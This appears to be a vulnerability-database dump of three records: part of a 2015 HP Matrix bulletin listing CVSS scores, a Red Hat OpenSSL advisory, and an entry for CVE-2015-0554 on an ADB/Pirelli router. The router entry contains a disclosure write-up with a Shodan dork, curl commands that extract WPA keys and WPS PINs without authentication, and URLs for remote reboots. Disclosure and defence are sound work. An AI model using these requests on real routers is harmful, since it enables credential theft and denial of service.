HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0
HP System Management Homepage (SMH) prior to version 7.5.0
HP Version Control Agent (VCA) prior to version 7.5.0
HP Version Control Repository Manager (VCRM) prior to version 7.5.0
HP Insight Orchestration prior to version 7.5.0
HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6
CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the
vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order
the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO
from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management
Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from
the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components
bundled with the HP Matrix Operating Environment in the following HP Security
Bulletins.
HP Matrix Operating Environment component
HP Security Bulletin Number
Security Bulletin Location
HP Systems Insight Manager (SIM)
HPSBMU03394
HPSBMU03394
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH)
HPSBMU03380
http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la
ng=en-us&cc=
HP Version Control Agent (VCA)
HPSBMU03397
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM)
HPSBMU03396
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr
_na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK
HPSBMU03413
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr
_na-c04774021
HISTORY
Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security update
Advisory ID: RHSA-2015:0066-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html
Issue date: 2015-01-20
Updated on: 2015-01-21
CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572
CVE-2014-8275 CVE-2015-0204 CVE-2015-0205
CVE-2015-0206
=====================================================================
1. Summary:
Updated openssl packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),
Transport Layer Security (TLS), and Datagram Transport Layer Security
(DTLS) protocols, as well as a full-strength, general purpose cryptography
library.
A NULL pointer dereference flaw was found in the DTLS implementation of
OpenSSL. A remote attacker could send a specially crafted DTLS message,
which would cause an OpenSSL server to crash. (CVE-2014-3571)
A memory leak flaw was found in the way the dtls1_buffer_record() function
of OpenSSL parsed certain DTLS messages. A remote attacker could send
multiple specially crafted DTLS messages to exhaust all available memory of
a DTLS server. (CVE-2015-0206)
It was found that OpenSSL's BigNumber Squaring implementation could produce
incorrect results under certain special conditions. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. Note that this issue occurred rarely and with a low probability,
and there is currently no known way of exploiting it. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a
non-ephemeral key even when the ephemeral ECDH cipher suite was selected.
A malicious server could make a TLS/SSL client using OpenSSL use a weaker
key exchange method than the one requested by the user. (CVE-2014-3572)
It was discovered that OpenSSL would accept ephemeral RSA keys when using
non-export RSA cipher suites. A malicious server could make a TLS/SSL
client using OpenSSL use a weaker key exchange method. (CVE-2015-0204)
Multiple flaws were found in the way OpenSSL parsed X.509 certificates.
An attacker could use these flaws to modify an X.509 certificate to produce
a certificate with a different fingerprint without invalidating its
signature, and possibly bypass fingerprint-based blacklisting in
applications. (CVE-2014-8275)
It was found that an OpenSSL server would, under certain conditions, accept
Diffie-Hellman client certificates without the use of a private key.
An attacker could use a user's client certificate to authenticate as that
user, without needing the private key. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to mitigate the above issues. For the update to
take effect, all services linked to the OpenSSL library (such as httpd and
other SSL-enabled services) must be restarted or the system rebooted.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix
1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues
1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-1.0.1e-30.el6_6.5.ppc.rpm
openssl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-1.0.1e-30.el6_6.5.s390.rpm
openssl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64:
openssl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-static-1.0.1e-34.el7_0.7.s390.rpm
openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3571
https://access.redhat.com/security/cve/CVE-2014-3572
https://access.redhat.com/security/cve/CVE-2014-8275
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0205
https://access.redhat.com/security/cve/CVE-2015-0206
https://access.redhat.com/security/updates/classification/#moderate
https://www.openssl.org/news/secadv_20150108.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X
ENFobdxQdJ+gVAiRe8Qf54A=
=wyAg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201501-0227 | CVE-2015-0554 | ADB P.DGA4001N Vulnerability in obtaining important information in router firmware |
CVSS V2: 9.4 CVSS V3: - Severity: HIGH |
The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface.
Successful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks.
ADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected. - Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure
HomeStation Movistar
- Author:
Eduardo Novella @enovella_
ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork :
+ "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)
- Summary:
HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any
IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>
# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
We can observe at the source:
<!-- hide
var sessionKey='846930886';
function btnReset() {
var loc = 'rebootinfo.cgi?';
loc += 'sessionKey=' + sessionKey;
var code = 'location="' + loc + '"';
eval(code);
}
// done hiding -->
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
# All the information what we can fetch from.
#----------------------------------------------
webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
